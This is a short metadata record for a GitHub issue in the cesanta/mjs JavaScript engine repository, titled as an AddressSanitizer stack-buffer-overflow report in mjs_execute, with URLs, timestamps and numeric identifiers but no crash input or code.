AddressSanitizer: stack-buffer-overflow in mjs_execute mjs.c:9650
https://api.github.com/repos/cesanta/mjs/issues/167/comments
0
2021-05-19T08:44:06Z
2021-05-19T08:44:06Z
https://github.com/cesanta/mjs/issues/167
895,165,377
167
3,882